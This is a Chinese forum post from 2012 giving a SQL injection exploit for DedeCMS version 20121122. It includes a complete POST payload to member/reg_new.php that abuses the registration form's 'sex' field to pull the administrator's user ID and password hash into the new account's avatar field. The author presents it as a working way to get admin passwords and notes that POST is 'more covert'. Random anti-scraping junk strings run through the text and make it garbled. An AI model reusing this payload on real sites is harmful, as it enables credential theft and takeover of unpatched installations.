dedecms版本 20121122
0 o' [, s: b1 d
5 |* `* B5 h* L/ Z5 `# c需要magic_quotes_gpc=Off
3 b; G+ |# p/ H/ e S: v) x9 X
+ o4 q7 q+ Q+ z4 d, b应该是没有什么大危害的漏洞.% d. x5 }% ^/ K0 i' ]
原来发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.
* x4 w3 U. Q" Q. q0 Z
9 t, y* x% T. y3 B' N是一个漏洞.其实不仅仅是审核机制绕过,也可以获得管理员密码的.8 K5 b; J$ q% `) n9 H6 i5 y
POST提交以下数据,其实不用POST提交的,这样隐蔽点.- K* b7 j9 p5 ]5 [/ e+ H
- A- s3 h$ N5 ^2 n5 phttp:///de/member/reg_new.php1 L# _; P7 N( m$ Z( x( o# h
4 Z/ p4 @& a: Y% G' e! b4 B9 y. s: B
POST
4 g; V) h: ]! y1 f9 C+ C+ q2 F* f, J; I8 G6 N9 [
dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&userid=c4rp3nt3r&uname=c4rp3nt3r&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss&safequestion=0&safeanswer=&sex=boy',100,100,'[email protected]',1000,0,'www' and @`'`,(select concat(userid,0x3a,pwd) from `#@__admin` limit 1),0,'',1316751900,'',1316751900,'');%00&vdcode=glos&agree=
5 a) X [) ]6 S( r! l9 `! z* L) {
9 u, @& {3 |7 \& s& |+ x6 l& D成功注册后,头像处里面有好玩的信息.
8 V9 n6 W; k- i) G5 i0 w+ i( o i* A4 D* X8 Y! a- C$ M2 D$ B
|
发表于 2012-12-5 10:03:32
收藏
分享
支持
反对